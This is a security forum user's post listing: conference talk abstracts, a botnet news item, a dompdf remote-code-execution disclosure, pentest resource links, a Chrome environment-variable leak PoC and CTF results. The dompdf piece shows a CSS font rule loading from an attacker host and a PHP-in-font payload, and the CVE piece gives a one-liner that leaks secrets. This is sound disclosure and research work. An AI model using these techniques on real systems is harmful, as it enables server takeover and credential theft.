Nytro
-
Posts
18578 -
Joined
-
Last visited
-
Days Won
642
Posts posted by Nytro
-
-
De-a lungul timpului am observat foarte des intrebarea: “Cum sa incep cu domeniul security?”. Exista atat persoane la inceput de drum care isi doresc o cariera pe aceasta cale cat si persoane cu experienta in domeniul IT dornice sa inteleaga ce presupune acest domeniu. Voi incerca sa raspund acestei intrebari din perspectiva personala, oferind sugestii celor care nu stiu cu ce sa inceapa si cum sa porneasca pe acest drum.
-
4
-
2
-
-
Have you considered that in certain situations the way hackers exploit vulnerabilities over the network can be predictable? Anyone with access to encrypted traffic can reverse the logic behind the exploit and thus obtain the same data as the exploit.
Various automated tools have been analyzed and it has been found that these tools operate in an unsafe way. Various exploit databases were analyzed and we learned that some of these are written in an insecure (predictable) way.
This presentation will showcase the results of the research, including examples of exploits that once executed can be harmful. The data we obtain after exploitation can be accessible to other entities without the need of decrypting the traffic. The SSL/TLS specs will not change. There is a clear reason for that and in this presentation I will argue this, but what will change for sure is the way hackers will write some of the exploits.-
2
-
2
-
-
O sa exploram impreuna viata unui blue-teamer. O sa vedem exemple despre cum nimic nu e niciodata sigur, despre cursa de-a soarecele si pisica intre blue-team si atackatori dar si despre cum userii gasesc mereu cate ceva nou si interesant care strica planurile de securitate ale unei firme.
-
1
-
-
Pe parcursul prezentarii, vom aborda o tema ce se invarte mai mult in jurul Red Teaming-ului, ci anume – BadUSB. Ce este, cum il putem folosi, cateva real-life use case-uri, payload development, si bypass-uri cu acesta (UAC, CLM, AMSI, etc.).
-
1
-
-
Acest studiu se concentreaza pe analizarea unui exploit recent publicat in luna Ianuarie 2022 ce afecteaza componenta de sistem win32k din Windows kernel si rezulta intr-o vulnerabilitate de tipul elevare de privilegii. Analiza exploiturilor de tipul 1day ne poate ajuta atat pe plan defensiv, prin crearea de detectii relevante asupra celor mai noi tehnicilor de exploatare, cat si in identificare si prevenirea unor noi vulnerabilitati similare in aceleasi componente. Totodata, cercetarea acestui CVE reprezinta un bun exemplu in care patch-urile aplicate initial nu mitigheaza in profunzime problema. In cadrul prezentarii, vom discuta despre notiuni de Windows internals, atacuri de tip data-only, WinDbg kernel debugging si indicatori de detectie, cu un focus principal pe analiza defensiva si intelegerea procesului de exploatare.
-
1
-
-
În ziua de azi, când tot mai multe firme aleg sa isi tina infrastructura în diversele clouduri publice, ar trebui sa putem arunca o privire asupra posibilelor probleme care pot apărea. Vom avea o privire de ansamblu a baseline-ului de securitate în clouduri, diverse tooluri de evaluare a securitatii, apoi vom continua cu o privire spre Lambda și Kubernetes.
-
O detaliere orientata catre incepatori referitoare la modul de functionare intern al sistemului de operare Windows. Vom trece prin arhitectura acestuia, vom vedea componentele, cum interactioneaza intre ele si care este rolul fiecareia.
-
Voi prezenta cate date introductive despre modelul de securitate al SO Android, cateva tipuri de framework-uri pentru dezvoltarea de aplicatii de Android. Voi prezenta cateva tool-uri care sa ajute: MobSF, Frida, Objection, RMS, ADB, Drozer. Dupa care voi prezenta diferite atacuri precum XSS, SQLI, Arbitrary URL Opening, Sensitive data stored Unencrypted, DeepLinking, Bypass Root & SSL Pinning, Dynamic instrumentation to obtain precious data.
-
Recently, Amazon Web Services (AWS) cloud environment has reached more than 200 services, which presents both possibilities of business expansion and new concerns, such as an uncontrolled cloud environment, known as cloud sprawl. The more difficult it is to defend a network, the more likely it is that security incidents will occur. Moreover, the current security tools are either expensive or require large amounts of configuration. This research aims to find an automated IR solution that requires minimal configuration and can be used in any AWS environment. The solution is mapped against the first two steps of the NIST IR Life Cycle, namely Preparation and Detection & Analysis. It analyses the feasibility of two potential tools using Python, Lambda and AWS CLI, in a test environment with the ten most common services. Furthermore, AWS services for security logging and alerting are investigated, both premium and non-premium, with the goal to see what data can be extracted from them. The results indicate that the non-premium environment offers extensive data, while the premium ones provide alerts and additional logs that can easily pinpoint malicious activity. Based on the given performance, AWS CLI was considered to be the best alternative. Unlike AWS Lambda, it has no constraints (such as execution times and memory limits) and adds minimal overhead to the environment.
-
1.Why Blockchain Security?
2.Blockchain Elements That Need Securing
3.What is a “Smart Contract”?
4.Understanding Smart Contracts and their Architecture
5.Smart Contract Platforms
6.Applications that integrate with blockchain
7.Smart Contract Code and vulnerabilities.
8.Demo: Live Exploit (Maybe). -
Let me tell you a story about the time I’ve built a deadly ransomware virus in our secret hacking labs. Of course, the virus got lost into the wild and terrorized the world into a global ransomware epidemy, so that now every computer needs to stay at least 2 switches apart when communicating. Computers are now forced to wear a firewall each time a port is opened. Some say it’s all a conspiracy by Bill Gates to force us to install Windows Defender, others say the Internet will never be the same again…
-
Deschiderea conferintei ce va include detalii despre organizare, concursul CTF si desfasurarea evenimentului. De asemenea, veti afla mai multe despre comunitatea Romanian Security Team.
-
Prezentarile video sunt disponibile pe site: https://rstcon.com/prezentari/
Le puteti accesa direct de pe canalul de Youtube: https://www.youtube.com/channel/UCs-oJJm7A4VmwBtezIOn0JQ
Si exista si un playlist RSTCon #2: https://www.youtube.com/watch?v=MTYdX2hGVXY&list=PLTaLvwriPW8zi3pkblN8yAqbZDZur992d
-
1
-
-
New Variant of Russian Cyclops Blink Botnet Targeting ASUS Routers
ASUS routers have emerged as the target of a nascent botnet called Cyclops Blink, almost a month after it was revealed the malware abused WatchGuard firewall appliances as a stepping stone to gain remote access to breached networks.
According to a new report published by Trend Micro, the botnet's "main purpose is to build an infrastructure for further attacks on high-value targets," given that none of the infected hosts "belong to critical organizations, or those that have an evident value on economic, political, or military espionage."
Intelligence agencies from the U.K. and the U.S. have characterized Cyclops Blink as a replacement framework for VPNFilter, another malware that has exploited network devices, primarily small office/home office (SOHO) routers, and network-attached storage (NAS) devices.
Both VPNFilter and Cyclops Blink have been attributed to a Russian state-sponsored actor tracked as Sandworm (aka Voodoo Bear), which has also been linked to a number of high-profile intrusions, including that of the 2015 and 2016 attacks on the Ukrainian electrical grid, the 2017 NotPetya attack, and the 2018 Olympic Destroyer attack on the Winter Olympic Games.
Written in the C language, the advanced modular botnet affects a number of ASUS router models, with the company acknowledging that it's working on an update to address any potential exploitation –
- GT-AC5300 firmware under 3.0.0.4.386.xxxx
- GT-AC2900 firmware under 3.0.0.4.386.xxxx
- RT-AC5300 firmware under 3.0.0.4.386.xxxx
- RT-AC88U firmware under 3.0.0.4.386.xxxx
- RT-AC3100 firmware under 3.0.0.4.386.xxxx
- RT-AC86U firmware under 3.0.0.4.386.xxxx
- RT-AC68U, AC68R, AC68W, AC68P firmware under 3.0.0.4.386.xxxx
- RT-AC66U_B1 firmware under 3.0.0.4.386.xxxx
- RT-AC3200 firmware under 3.0.0.4.386.xxxx
- RT-AC2900 firmware under 3.0.0.4.386.xxxx
- RT-AC1900P, RT-AC1900P firmware under 3.0.0.4.386.xxxx
- RT-AC87U (end-of-life)
- RT-AC66U (end-of-life), and
- RT-AC56U (end-of-life)
Cyclops Blink, besides using OpenSSL to encrypt communications with its command-and-control (C2) servers, also incorporates specialized modules that can read and write from the devices' flash memory, granting it the ability to achieve persistence and survive factory resets.
A second reconnaissance module serves as a channel for exfiltrating information from the hacked device back to the C2 server, while a file download component takes charge of retrieving arbitrary payloads optionally via HTTPS.
The exact mode of initial access is currently not known, but Cyclops Blink is said to have impacted WatchGuard devices and Asus routers located in the U.S., India, Italy, Canada, and Russia since June 2019. Some of the affected hosts belong to a law firm in Europe, a medium-sized entity producing medical equipment for dentists in Southern Europe, and a plumbing company in the U.S.
With IoT devices and routers becoming a lucrative attack surface due to the infrequency of patching and the absence of security software, Trend Micro warned that this could lead to the formation of "eternal botnets."
"Once an IoT device is infected with malware, an attacker can have unrestricted internet access for downloading and deploying more stages of malware for reconnaissance, espionage, proxying, or anything else that the attacker wants to do," the researchers said.
"In the case of Cyclops Blink, we have seen devices that were compromised for over 30 months (about two and a half years) in a row and were being set up as stable command-and-control servers for other bots."
Found this article interesting? Follow THN on Facebook, Twitter and LinkedIn to read more exclusive content we post. -
- The popular PHP library dompdf (used for rendering PDFs from HTML) suffers from a vulnerability that allows Remote Code Execution in certain configurations
- By injecting CSS into the data processed by dompdf, it can be tricked into storing a malicious font with a .php file extension in its font cache, which can later be executed by accessing it from the web
- We reported the vulnerability to dompdf on October 5th 2021. Since no patch is available yet, we are now publishing details about the vulnerability to inform the public about the risk and possible workarounds
Introduction
During a client engagement last year, we were faced with a website that seemed fairly impenetrable at first glance, due to its largely static nature:
Target website (for the purposes of this article, we created a simple demo application that behaves similarly to the client’s website in the relevant aspects)
While investigating the site, we did manage to find a reflected Cross-Site Scripting (XSS) issue:
Seeing as the site did not store any sensitive information in clients’ browsers (such as authentication cookies), this in itself was a finding of low severity.
At some point however, an interesting feature caught our eye. The site offered the option to export some of its pages in PDF form:
Interesting feature: Exporting the website as a PDF, rendered on the server
Promptly, the reflected XSS became a lot more interesting, because it let us control the input to the server-side PDF generator as well:
Website with injected HTML in the title, rendered as PDF on the server
Though it wasn’t possible to inject JavaScript that the PDF renderer would interpret, we were able to inject arbitrary HTML (as shown above with the ‘In PDF’ title in italics).
Running pdfinfo on the exported PDF told us which library was responsible for the PDF rendering on the server:
Output of pdfinfo showing the PDF renderer used in the back-end
We thus knew which HTML-to-PDF converter was used in the back-end (dompdf), and at which version.
(Note that the version actually in use on the client’s server was v0.8.5, but since the exploit path we will show here still works the same on the newest version v1.2.0, we will be using this version for the purpose of the article. At the time of disclosure, there are no known vulnerabilities for either version 0.8.5 or 1.2.0.)
Looking for a vulnerability
At this point, we shifted our attention to dompdf’s source code, to see if we might be able to find a vulnerability that could get us further access to the server.
The first thing that caught our eye was the option to execute embedded PHP during PDF rendering, which, if enabled, would have made our job quite easy:
/** * Enable embedded PHP * * If this setting is set to true then DOMPDF will automatically evaluate * embedded PHP contained within ... tags. * * ==== IMPORTANT ==== * Enabling this for documents you do not trust (e.g. arbitrary remote html * pages) is a security risk. Embedded scripts are run with the same level of * system access available to dompdf. Set this option to false (recommended) * if you wish to process untrusted documents. * * This setting may increase the risk of system exploit. Do not change * this settings without understanding the consequences. Additional * documentation is available on the dompdf wiki at: * * * @var bool */ private $isPhpEnabled = false;
However, this feature turned out to be disabled. (Note: If you are running dompdf on your server, you probably want to ensure this feature is turned off. The official guide for ‘Securing dompdf’ concurs.)
The next interesting setting concerned the loading of remote resources:
/** * Enable remote file access * * If this setting is set to true, DOMPDF will access remote sites for * images and CSS files as required. * * ==== IMPORTANT ==== * This can be a security risk, in particular in combination with isPhpEnabled and * allowing remote html code to be passed to $dompdf = new DOMPDF(); $dompdf->load_html(...); * This allows anonymous users to download legally doubtful internet content which on * tracing back appears to being downloaded by your server, or allows malicious php code * in remote html pages to be executed by your server with your account privileges. * * This setting may increase the risk of system exploit. Do not change * this settings without understanding the consequences. Additional * documentation is available on the dompdf wiki at: * * * @var bool */ private $isRemoteEnabled = false;
To check for the state of this setting, we used the XSS to include an external stylesheet (shrinking the image and setting its background to light grey for testing purposes):
We could thus confirm that the setting was enabled, and could proceed with figuring out what this allowed us to do.
First possibility: The font cache index
When $isRemoteEnabled is set (or on versions ≤ 0.8.5, regardless of this setting), dompdf allows loading custom fonts through font-face CSS rules such as the following:
@font-face { font-family:'TestFont'; src:url('http://attacker.local/test_font.ttf'); font-weight:'normal'; font-style:'normal'; }When an external font is used, dompdf caches it locally in the /lib/fonts sub-directory, and adds a corresponding entry in dompdf_font_family_cache.php using saveFontFamilies(). This function encodes the fonts known to dompdf as a PHP array, together with the information needed to look them up later.
From a log file we found elsewhere on the system, we already suspected that dompdf was stored in a directory accessible from the web-root, and indeed the lack of an error message when attempting to access the font cache index seemed to indicate the same:
Attempting to access the font cache index directly: Blank page instead of an error message
Since this means a PHP file we can access externally is generated based on input controlled by us, it seemed a worthwhile avenue to explore for potential vulnerabilities.
However, the only parameter we had direct influence over (the $family) was escaped sufficiently using addslashes() to make exploitation impossible. We therefore had to keep looking further - though not very far.
Next step: The font cache
If we can’t use the font cache index… can we use the font cache directly?
Let’s see how dompdf registers new fonts (shown here in condensed form for the sake of clarity):
/** * @param array $style * @param string $remoteFile * @param resource $context * @return bool */ public function registerFont($style, $remoteFile, $context = null) { $fontname = mb_strtolower($style["family"]); $styleString = $this->getType("{$style['weight']} {$style['style']}"); $fontDir = $this->options->getFontDir(); $remoteHash = md5($remoteFile); $prefix = $fontname . "_" . $styleString; $prefix = preg_replace("[\\W]", "_", $prefix); $prefix = preg_replace("/[^-_\\w]+/", "", $prefix); $localFile = $fontDir . "/" . $prefix . "_" . $remoteHash; $localFile .= ".".strtolower(pathinfo(parse_url($remoteFile, PHP_URL_PATH), PATHINFO_EXTENSION)); // Download the remote file list($remoteFileContent, $http_response_header) = @Helpers::getFileContent($remoteFile, $context); $localTempFile = @tempnam($this->options->get("tempDir"), "dompdf-font-"); file_put_contents($localTempFile, $remoteFileContent); $font = Font::load($localTempFile); if (!$font) { unlink($localTempFile); return false; } $font->parse(); $font->close(); unlink($localTempFile); // Save the changes file_put_contents($localFile, $remoteFileContent); $this->saveFontFamilies(); return true; }There’s a few things this code snippet tells us:
- The filename of a newly cached font is deterministic and based on information we have, namely the font’s name, the chosen style and a hash of its remote URL (line 9-19). The test-font from above with URL http://attacker.local/test_font.ttf and weight/style “normal” would e.g. get stored as testfont_normal_d249c21fbbb1302ab53282354d462d9e.ttf
- Though care is taken to prevent the possibility of a path traversal vulnerability (by removing potentially dangerous characters in line 16 and 17), the font’s original file extension is kept
- The font needs to be valid in the sense that it has to survive loading and parsing by php-font-lib (lines 28 and 35)
When inspecting php-font-lib’s source code, it quickly became apparent that this library only checks a font’s internal consistency, based on its file headers, and completely ignores its file extension. So what happens if we take a valid .ttf font, add a <?php phpinfo(); ?> in its Copyright section, store it as 'exploit_font.php' and include it via an injected CSS file? Well…
phpinfo() is executed on the victim server when accessing the malicious font file (Side note: The redacted information was replaced by random noise before blurring)
We have published the demo application and exploit at github.com/positive-security/dompdf-rce.
Analysis
Security vulnerabilities often occur due to (design) decisions made based on incorrect assumptions about underlying or interconnected components. For the concrete scenario we encountered, we could identify three decisions/assumptions that contributed significantly to the RCE vulnerability on the client’s server:
- “It should be okay to trust php-font-lib with checking fonts, since it will only accept fonts that are valid (and have the appropriate file extension)”: This assumption, made by the dompdf developers, turned out to be incorrect because php-font-lib’s concept of a valid font only required consistency between the font’s headers and its internal structure, irrespective of its file extension
- “It should be okay to have dompdf’s setting $isRemoteEnabled set to true, since the website itself is essentially static and we therefore control the input to the PDF renderer”: This assumption, made by our client, was broken by the reflected XSS vulnerability
- “It should be okay to have dompdf in an externally accessible sub-directory”: This action, though probably not performed consciously by our client but rather out of convenience, sadly turned out to be misguided
Though all three factors were necessary for the full exploit, they differ in respect to ‘preventability’.
The first decision, which led to the font vulnerability, was a mistake that (albeit unfortunate) can readily occur in any complex software project and is essentially impossible to avoid completely. The second decision increased the attack surface for our client, but was necessary to implement the intended functionality.
The third factor could be seen more critically however, since it directly contradicted the top-most point outlined in the guide for ‘Securing dompdf’, which has existed in this form since 2016. From a post-mortem perspective, it would therefore make sense to examine the workflow that resulted in this step being taken, as including an external library without properly assessing its security impact would have been the most easily preventable factor.
Impact
There are a number of use cases that require server-side generation of PDFs containing user-supplied input, such as ticket purchases, receipts/invoices or other automated emails from service providers, or even Corona test certificates. It is possible that some of these services are also affected, if the following preconditions are met:
- dompdf is installed in a directory accessible through the web. This could for example easily happen if Composer was used to install the library somewhere inside the docroot without explicitly forbidding access to the vendor folder
- PDFs are being generated using insufficiently sanitized user input. This could be caused through e.g. an XSS, as demonstrated here, or by directly passing user data to the back-end (such as the user’s name or address)
- dompdf version ≤ 0.8.5 is being used, or $isRemoteEnabled is set to true. Note that versions ≤ 0.8.5 do not require $isRemoteEnabled to be set to be vulnerable, as they load certain remote elements (such as fonts) even with the setting deactivated
While we don't have installation numbers, GitHub metrics suggest dompdf to be the most popular option for generating PDFs from PHP:
Library Stars Forks Dependent Repos dompdf 8.6k 1.6k 59.2k snappy 4k 421 - mpdf 3.5k 886 16.6k tcpdf 3.2k 1.3k 14.5k tc-lib-pdf 1.2k 180 85 Mitigation
Though there isn’t a patch for dompdf available yet, there are steps you can take to minimize your risk of being exposed to this vulnerability.
- Make sure dompdf is not installed in a web-accessible directory. This is the most important point, as it would completely prevent the exploit
- Double-check the input sanitization you perform before passing data to dompdf, to prevent attackers from injecting HTML/CSS. This is a good idea in any case, as there might be other vulnerabilities that can be triggered in similar ways
- Update dompdf to a recent version and turn off $isRemoteEnabled, if possible for your use case. Though the most recent version available at time of publishing this article (1.2.0) is still susceptible to the vulnerability, it does consult the $isRemoteEnabled setting before attempting to download fonts from remote locations (unlike versions ≤ 0.8.5, which simply ignore the setting in that context)
- And finally, keep an eye out for a dompdf patch that fixes this vulnerability and apply it once it is available. You could for example stay up-to-date by subscribing to dompdf’s release feed with an Atom reader of your choice
Timeline
2021-10-05 Vulnerability reported to security@dompdf.org (from SECURITY.md)
2021-10-08 Followed up on report
2021-10-12 Created a GitHub issue to draw attention to report
2021-10-13 Report acknowledged, issue tagged for “v2.0.0”
2021-11-16 Version 1.1.0 released, without fix
2021-11-24 Version 1.1.1 released, without fix
2022-01-03 90 days since initial report
2022-02-07 Version 1.2.0 released, without fix
2022-02-07 Asked developers for patching horizon and notified them of upcoming disclosure
2022-02-16 Follow-up email
2022-03-10 Follow-up email
2022-03-15 Received response from dompdf that they "can not provide a time frame for said [v2.0] update at this moment"
2022-03-16 Public disclosureConclusion
While investigating a client website, we discovered a vulnerability in the PDF rendering PHP library dompdf that allowed us to upload font files with a .php extension to the web server. To trigger it, we used an XSS vulnerability that allowed us to inject HTML into a web page before it was rendered as a PDF. Since dompdf was installed in a web-accessible directory (and we knew its location thanks to a leaked logfile), we could navigate to the uploaded .php script, giving us code execution on the server.
Versions ≤ 1.2.0 of dompdf that are located in a web-accessible directory and have $isRemoteEnabled activated should be considered vulnerable, as should be versions ≤ 0.8.5 even with $isRemoteEnabled set to false.
The exploit files and source code for the demo application are available on GitHub.
Follow us on Twitter (@positive_sec) to keep up to date with our posts.
-
Penetration Testing
OffSec
- Penetration Testing with Kali - Online Security Training
- Offensive Security Student Support
- Offensive Security Forums
- Exploits Database by Offensive Security
Windows Privilege Escalation
- Checklists/Windows-Privilege-Escalation.md at master · netbiosX/Checklists
- Windows Privilege Escalation - a cheatsheet | Tim Arneaud
- OSCP - Windows Priviledge Escalation | Hacking and security
- FuzzySecurity | Windows Privilege Escalation Fundamentals
- Privilege Escalation | To Shell And Back: Adventures In Pentesting
Cheat Sheets
- Spawning a TTY Shell
- MSFVennom cheat sheet
- Msfvenom Cheat Sheet – Security-Geek
- Path Traversal Cheat Sheet: Linux — GracefulSecurity
- Path Traversal Cheat Sheet: Windows — GracefulSecurity
- Reverse Shell Cheat Sheet | pentestmonkey
- How to Bypassing Filter to Traversal Attacks ? | Hacking & Tricks
- Local Linux Enumeration & Privilege Escalation Cheatsheet – Rebootuser
- Escape From SHELLcatraz - Breaking Out of Restricted Unix Shells - Speaker Deck
- Common Web-services · Security - My notepad
- Nmap Cheat Sheet
- Luke’s Ultimate OSCP Guide: Part 3 — Practical hacking tips and tricks
- Penetration Testing Methodology - 0DAYsecurity.com
- OSCP-Survival-Guide.pdf
SQLinjection
- Login Bypass Using SQL Injection
- Hacking website using SQL Injection -step by step guide – Ethical Hacking Tutorials | Learn How to Hack | Hacking Tricks | Penetration Testing Lab
- Vulnhub – Kioptrix: Level 1.2 (#3) – Guillermo Cura
Enumeration Visualized WikiGuides
- OSCP · Teck_k2
- Offensive Security's Complete Guide to Alpha
- how-to-oscp-final.md
- Loot and Enumerate · Security - My notepad
- Offensive Security's PWB and OSCP - My Experience - Security SiftSecurity Sift
- Jack Hacks
- Interesting Local File Inclusion method | DiabloHorn
- ferreirasc/oscp: oscp study
- Offensive Security Certified Professional (OSCP) Review - Jim Wilbur's Blog
- Passing OSCP - scund00r
- BlackWinter Security | Code and Stuff
Linux Privilege Escalation
Pentest Practice Links
- Penetration test lab "Test lab" | Pentestit
- CTF365 - Capture The Flag | Security Training Platform
- [PentesterLab] PentesterLab Pro
- Mainsequence - Exploit Exercises
- OverTheWire: Natas Level 0
- Welcome [Root Me : Hacking and Information Security learning platform]
- Hack The Box :: Penetration Testing Labs
- Hack The Box :: Forums
- Vulnerable By Design ~ VulnHub
PentesterAcademy
Bug Bounty
HackerOne
Synack
Learn to hack and collaborate with other security researchers on bug bounties | BugBountyNotes.com GitHub - jhaddix/tbhm: The Bug Hunters Methodology Tomnomnom Vim Tutorial - Knowledge Base Assetnote Wordlists
Penetration Testing with Kali - Online Security Training Offensive Security Student Support Offensive Security - Purchase Page Offensive Security - Exam Scheduling Link Exploits Database by Offensive Security Offensive Security Forums Hack The Box :: Penetration Testing Labs Hack The Box :: Forums IppSec - YouTube Vulnerable By Design ~ VulnHub codingo/Reconnoitre: A security tool for multithreaded information gathering and service enumeration whilst building directory structures to store results, along with writing out recommendations for further testing. Scripts/Enumeration.py at master · MistSpark/Scripts · GitHubPentesting Links
- Penetration test lab "Test lab" | Pentestit
- CTF365 - Capture The Flag | Security Training Platform
- [PentesterLab] PentesterLab Pro
- Mainsequence - Exploit Exercises
- OverTheWire: Natas Level 0
- Welcome [Root Me : Hacking and Information Security learning platform]
Pentester Academy: Learn Pentesting Online AttackDefense Labs: Pentester Academy Attify Store - Offensive IoT Exploitation | Attify Store Flex Center // Infosec Skills :: HomeReverse Engineering
GREM
- IT and Information Security Cheat Sheets
- GIAC GREM Certification | Reverse Engineering Malware
- Cheat Sheet for Analyzing Malicious Software
Reading
VirusTotal Learn to Develop with Microsoft Developer Network | MSDN GitHub - ytisf/theZoo: A repository of LIVE malwares for your own joy and pleasure. theZoo is a project created to make the possibility of malware analysis open and available to the public. MalwareTech - Life of a Malware Analyst The “Ultimate”Anti-Debugging Reference DEF CON CHINA Reverse Engineering challengesARM
Hardware
- FCC OET Authorization Search
- IoT Firmware Exploitation Online
- Practical Reverse Engineering Part 1 - Hunting for Debug Ports · Hack The World
- Intro to Hardware Hacking - Dumping your First Firmware
- IoT Hacking Tools | Attify Store
- Electronics – /dev/ttyS0
- Extracting Flash Memory over SPI | GracefulSecurity
- NAND Flash Data Recovery Cookbook
- Centrifuge Platform® | Firmware Security Analysis | ReFirm Labs
- Binwalk Pro
Network Protocols
hasherezade (hasherezade) Hasherezade's projectsSDR Hacking
The Cryptopals Crypto ChallengesExploitDev
Corelan
- ..:: Corelan Team | Peter Van Eeckhoutte (corelanc0d3r) ::..
- Exploit writing tutorial part 1 : Stack Based Overflows | Corelan Team
- Exploit writing tutorial part 2 : Stack Based Overflows – jumping to shellcode | Corelan Team
- Exploit writing tutorial part 3 : SEH Based Exploits | Corelan Team
- Exploit writing tutorial part 3b : SEH Based Exploits – just another example | Corelan Team
- Exploit writing tutorial part 4 : From Exploit to Metasploit – The basics | Corelan Team
- Exploit writing tutorial part 5 : How debugger modules & plugins can speed up basic exploit development | Corelan Team
- Exploit writing tutorial part 6 : Bypassing Stack Cookies, SafeSeh, SEHOP, HW DEP and ASLR | Corelan Team
- Exploit writing tutorial part 7 : Unicode – from 0x00410041 to calc | Corelan Team
- Exploit writing tutorial part 8 : Win32 Egg Hunting | Corelan Team
- Exploit writing tutorial part 9 : Introduction to Win32 shellcoding | Corelan Team
Reverse Engineering and Binary Exploitation Series | PWNTHEBOX! FuzzySecurity | TutorialsARM
- Products
- GitHub - Billy-Ellis/Exploit-Challenges: A collection of vulnerable ARM binaries for practicing exploit development
- Writing ARM Assembly (Part 1) | Azeria Labs
- Search [Root Me : Hacking and Information Security learning platform]
- Corellium
- arm_exploitation/exploitation_on_arm_based_systems.pdf at master · sashs/arm_exploitation
- 15/85 Security
- ROP on ARM with radare2
- Microsoft Word - ARM paperF.docx
OSCE
- Offensive Security’s CTP & OSCE Review - Jack Hacks
- OSCE/CTP Prep Guide – Tulpa Security
- mona.py – the manual | Corelan Team
- Resources for OSCE
- CTP/OSCE Prep – Wrapping Up Our Prep - The Human Machine Interface
- h0mbre/CTP-OSCE: Scripts I used during CTP
- jtpereyda/boofuzz: A fork and successor of the Sulley Fuzzing Framework
- Study Guide & Tips: Offensive Security Certified Expert (OSCE) / Cracking The Perimeter (CTP) - Amin Bohio
- phra's blog ~ Technical posts about InfoSec
- abatchy's blog | OSCE Study Plan
- Upgrade from LFI to RCE via PHP Sessions - RCE Security
- Taking_Back_Netcat.pdf
- OSCE Review (CTP Course) - Everything S3curity
The Human Machine Interface h0mbre/Learning-C: A series of mini-projects used to learn C for beginners metasploit-payloads/c/meterpreter/workspace at master · rapid7/metasploit-payloadsLinux Exploitation
OSEE
- awe_syllabus_2018
- OSEE - AWEstralia 2018 preparations | www.jollyfrogs.com
- timip/OSEE: OSEE Preparation
- Common WinDbg Commands (Thematically Grouped)
- Windows Kernel Exploitation Tutorial Part 1: Setting up the Environment - rootkit
- abatchy's blog | Tutorials
IoT Hardware
The best resources for learning exploit development – Fabio Baroni Backdooring PE Files with Shellcode - Red Teaming ExperimentsWindows Exploitation
- Ricerca Security: "I'll ask your body": SMBGhost…
- SMBleedingGhost Writeup: Chaining SMBleed (CVE-20…
- Windows Internals & Software Drivers – OSR
- What is this? - Red Teaming Experiments
Qemu
- Installing Qemu for Windows [E-Maculation wiki]
- Qemu package and guide for Windows available • E-Maculation Forum
- Index of /lubuntu/releases/16.04/release
- Building PPC Linux code using QEMU on Ubuntu 18.04 LTS
- Debian Ports
- Qemu - Google Drive
- hugsy/cemu: Cheap EMUlator: lightweight multi-architecture assembly playground
Microcontrollers and SDRs
GNURadio
Embedded Programming
WebSecAcademy
-
1
-
2
-
CVE-2022-0337 System environment variables leak on Google Chrome, Microsoft Edge and Opera
📝 Description
Successful exploitation of this vulnerability can lead to the leak of user's secrets stored inside a system environment variables. A security bug was found in Chromium 92 version and patched in 97 version. There are several web browsers based on the chromium engine, for instance, Google Chrome, Microsoft Edge, Opera, and Brave. All of them were vulnerable, except for Brave. The vulnerability is in the File system access API, more specifically in window.showSaveFilePicker() method.
CVE Version: CVE-2022-0337
Credits: Maciej Pulikowski
Reward: $10,000 from Google VRP
Web browser versions vulnerability:
92-96 Vulnerable ❗️❗️
97+ Patched (safe) ✔92-96 Vulnerable ❗️❗️
97+ Patched (safe) ✔78-82 Vulnerable ❗️❗️
82 Patched (safe) ✔Safe ✔ Safe ✔ Check your web-browser version:
- Google Chrome: chrome://version/
- Microsoft Edge: edge://version/
- Opera: opera://update
Operation Systems:
ONLY WINDOWS are vulnerable. Linux and Mac are safe.
📺 Youtube Proof of Concept
https://www.youtube.com/watch?v=q7OIEWtalg8
Thanks for the thumbs up and subscriptions 😀👍
👨💻 Code Proof of concept
The simplest one
- Write in your Devtools:
let a = await window.showSaveFilePicker({suggestedName:'%username%'}); a.name;- Save file
- Your username should appear
In the example, it is used a %username% environment variable. It returns Windows username logged in. Moreover, there are much more interesting environment variables:
Here are some examples:
- AWS_SECRET_ACCESS_KEY
- AZURE_CLIENT_SECRET
- binance_secret
- GITHUB_TOKEN
- GOOGLE_API_KEY
and many more...
So the attacker could gain an access to targets AWS services, Github account or Binance token to API (withdraw money) and more...
Check out more secrets in environment variables on my repository:
🦄🔒 Awesome list of secrets in environment variables 🖥️
Crafted HTML with improvlments
The previous example is run in local Google Chrome Devtools.
Obviously, the attacker could craft a special HTML file (website) to do successful exploitation of this vulnerability.
env.html - is an example of crafted special HTML in the repository.
But, do really user is required to download a file?
Yes, however, the attacker can create a website to encourage User to hold ENTER button on keyboard for 2 seconds to run and accept saving file dialog. Because windows dialog by default focus Save button, file will be saved with only blink.
*.gif is from Opera (Chrome and Edge were already fixed)
In conclusion, user after holding the ENTER button on keyboard for 2 seconds could lead to leak of his system environments variables. This is a significant problem because user could store important secrets in system environments variable ex. Access to his AWS services, Github account or Binance
🧠 Things to remember from the write-up:
- Environments variables can store secrets ex. tokens, api-key, secrets
- if payload "%USERNAME%" or "$:USERNAME" or "${USERNAME}" or "$USER" return real username then target is vulnerable
🔨 Fix in chromium
I gave myself challange to repair the bug. Here, I would like to underline that I am not a c++ dev 😎.
source: https://bugs.chromium.org/p/chromium/issues/detail?id=1247389#c9
One of solution was to just replace character % in suggestedName to _ . It should solve the problem.
My solution:
could be insert in:
and the results are:
Before fix:
After my fix:
Indeed it solved the problem, but it wasn't the best place to insert the code 😋 . However, I was very happy to manage to repair it by myself 😎
Final fix can be found here:
https://bugs.chromium.org/p/chromium/issues/detail?id=1247389#c12
🌌 Timeline
- [07.09.2021, 10:40 PM GMT+2] Bug reported by Maciej Pulikowski
- [07.09.2021, 11:36 PM GMT+2] Bug accepted (Pri:1, Severity-High)
- [08.11.2021, 1:30 AM GMT+1] My submit for possible fix in code for chromium source
- [10.12.2021, 6:09 PM GMT+1] Fixed
- [7.01.2022, 2:09 AM GMT+1] Reward of $10,000
- [18.03.2022, 6:30 PM GMT+1] Google removed security view restrictions
💻 Useful links
- Issue 1247389: Security: Possible to see the user's system environment variables like secrets, tokens or keys
- 🦄🔒 Awesome list of secrets in environment variables 🖥️
- The File System Access API: simplifying access to local files
- File System Access - Documentation
- File System Access Web API - Chromium Security Model
🤝 Show your support
✔️ Disclaimer
This project can only be used for educational purposes. Using this software against target systems without prior permission is illegal, and any damages from misuse of this software will not be the responsibility of the author.
Sursa: https://github.com/Puliczek/CVE-2022-0337-PoC-Google-Chrome-Microsoft-Edge-Opera
-
1
-
Multumim tuturor care au participat la concursul CTF! De asemenea multumim tuturor celor care au creat exercitii!
Clasamentul final poate fi vazut aici: https://ctf.rstcon.com/scoreboard
- Locul I - adragos (3000 RON)
- Locul II - Kayn (2000 RON)
- Locul III - edmund (1000 RON)
Castigatorii au fost contactati pentru oferirea premiilor.
